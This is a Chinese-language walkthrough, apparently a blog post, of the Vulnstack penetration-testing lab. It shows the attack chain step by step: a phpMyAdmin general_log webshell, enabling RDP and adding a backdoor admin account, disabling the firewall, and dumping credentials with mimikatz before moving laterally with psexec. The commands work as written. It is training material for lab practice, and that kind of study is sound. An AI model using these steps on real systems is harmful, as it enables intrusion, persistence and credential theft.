文章详细介绍了如何在Kali环境下进行渗透测试,包括靶场下载、网卡配置、外网信息收集与提权,接着通过PHPMyAdmin利用日志文件getshell,进一步实现内网渗透,包括权限提升至system,使用冰蝎和Mimikatz进行横向移动及密码获取,并对内网进行探测和端口扫描。
环境搭建
靶场下载
靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
靶机通用密码: hongrisec@2019
登进去要修改密码,改为 HONGRISEC@2019
网卡配置
保证kali和本机可以访问win7,给win7配置两块网卡,让win7既可以访问外网,也可以访问内网
按照拓扑图搭建环境:
攻击机:
kali ip: 192.168.70.128
靶机:
win7 外网ip:192.168.70.129 内网ip:192.168.52.128
win03 ip: 192.168.52.141
win08 ip: 192.168.52.138
在win7上使用phpstudy开启web服务
外网渗透
信息收集
先对win7进行常见端口扫描,可以看到开了两个服务,80端口的http服务和3306端口的mysql服务
一般看到MySQL就会想到phpmyadmin,然后弱口令试一下,搞一下目录扫描
直接用kali自带的dirb,发现70个结果,有很多phpmyadmin的目录,phpinfo.php
提权
访问phpmyadmin,root/root 试一下,就这样进入后台了
没有发现什么有价值的东西,从phpinfo中可以看到网站的绝对路径,配合phpmyadmin尝试一下写入webshell
select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'C:\phpStudy\WWW\shell.php'
果然,无法写入,因为secure_file_priv的值为null ,表示限制mysql不允许导入|导出
换个思路,这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。
执行
SHOW VARIABLES LIKE 'general%'
开启它,设置general_log为on,并且把日志存放路径设置为网站根目录,这样就可以写入shell了
set global general_log = "ON";
SET global general_log_file='C:/phpStudy/WWW/shell.php';
更改后
写入shell
select '<?php eval($_POST[cmd]);?>';
冰蝎连接
内网渗透
查看当前权限
远程登录
手动开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
查看端口状态
添加用户
net user hahaha 123@qq.com /add # 添加账户密码
net localgroup administrators hahaha /add # 给hahaha账户添加为管理员权限
net user hahaha # 查询是否成功添加hahaha用户
使用冰蝎反弹shell到kali
参考这个:
https://blog.youkuaiyun.com/weixin_45745344/article/details/112321742
使用CS生成木马,通过冰蝎上传到服务器,看到权限为administrator,这里记得把回连时间改为0
使用插件梼杌进行权限提升,权限变成了system
还可以使用CS关闭防火墙
查看防火墙是否开启
shell netsh firewall show state
关闭防火墙
shell netsh firewall set opmode disable
添加远程登录用户,开启3389
成功登录
横向移动
域的话依然可以使用CS进行提权
使用system权限用mimikatz进行明文密码获取
对内网进行网络探测,发现另外两台主机,域控为OWA
对他俩进行端口扫描,发现135,445端口都开着
使用smb协议创建两个监听端口
server2008使用psexec64进行横向移动,2003用psexec
全部上线成功
结束
扫一扫
589
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
